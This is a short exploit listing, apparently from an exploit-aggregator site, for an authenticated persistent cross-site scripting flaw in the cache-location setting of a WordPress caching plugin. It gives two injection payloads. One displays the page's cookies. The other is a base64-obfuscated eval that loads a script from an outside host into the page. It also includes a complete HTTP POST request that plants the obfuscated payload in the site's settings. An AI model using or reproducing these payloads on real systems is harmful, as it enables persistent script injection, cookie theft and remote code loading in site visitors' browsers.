Share
## https://sploitus.com/exploit?id=WPEX-ID:9DF86D05-1408-4C22-AF55-5E3D44249FD0
### -- [ Payloads: ]

[$] ";' onmouseover=alert(document.cookie); style=position:fixed;width:100%;height:100%;margin:0;padding:0;left:0;top:0; 

[$] ";' onmouseover=eval(atob(`eD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0naHR0cHM6Ly9tMHplLnJ1L3BheWxvYWQvYTJyLmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgp`)); style=position:fixed;width:100%;height:100%;margin:0;padding:0;left:0;top:0; 



### -- [ PoC | Authenticated Persistent XSS | Cache Location: ]

[!] POST /wp-admin/options-general.php?page=wpsupercache&tab=settings HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 773
Cookie: [admin cookies]

_wpnonce=c6b9540023&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwpsupercache%26tab%3Dsettings&action=scupdates&wp_cache_enabled=1&wp_cache_mod_rewrite=0&wp_cache_not_logged_in=2&cache_rebuild_files=1&wp_cache_location=%2Fvar%2Fwww%2Fexample.com%2Fwp-content%2Fcache%2F%22%3B%27+onmouseover%3Deval%28atob%28%60eD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0naHR0cHM6Ly9tMHplLnJ1L3BheWxvYWQvYTJyLmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgp%60%29%29%3B+style%3Dposition%3Afixed%3Bwidth%3A100%25%3Bheight%3A100%25%3Bmargin%3A0%3Bpadding%3A0%3Bleft%3A0%3Btop%3A0%3B+&_wpnonce=c6b9540023